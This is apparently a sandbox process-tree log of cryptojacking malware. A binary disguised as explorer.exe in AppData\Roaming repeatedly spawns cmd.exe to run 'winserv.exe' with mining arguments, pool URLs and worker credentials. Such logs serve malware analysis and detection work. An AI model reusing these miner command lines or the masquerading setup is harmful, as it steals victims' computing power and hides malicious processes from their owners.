C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5764
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4268
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3068
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:876
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3768
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:852
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2432
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3884
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5332
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:684
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3436
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2472
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3316
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:560
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3944
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1092
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5816
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1520
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4008
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5652
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:744
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1548
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:4320
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1204
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1000
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1820
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1420
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2980
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:232
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5776
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2580
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2256
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5728
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5128
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1980
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:6072
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4156
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:248
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1412
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3548
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:6068
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4668
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1456
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3880
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4520
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5864
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5112
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5168
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5384
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4356
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3208
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4496
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5080
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3012
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5268
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4604
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5428
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5024
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3160
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2780
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5868
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5104
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4828
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3140
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3896
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:912
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2084
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4244
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2296
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5532
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4616
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4784
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2284
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:560
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1384
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1552
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1520
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3564
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:732
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5984
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5732
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2952
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5700
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2576
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5852
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5264
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:456
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:2304
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1044
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3000
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1596
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:820
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3476
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3500
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:6072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4884
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4712
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3548
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3800
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1604
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4904
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5520
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1824
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5064
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5072
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5784
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4888
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5876
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4496
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3784
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2456
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1972
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:940
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4200
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4460
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3760
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5296
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1868
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4804
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5956
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:852
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5584
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5328
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5332
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2300
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:552
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5568
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1816
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:916
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:488
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4396
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5952
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3200
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1020
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2824
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3788
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2844
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:6060
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5596
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1204
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5060
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5664
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:6016
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1784
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1940
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4856
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3572
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2956
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4704
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1148
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:536
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5740
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1532
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:340
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4712
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3548
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2224
-
-
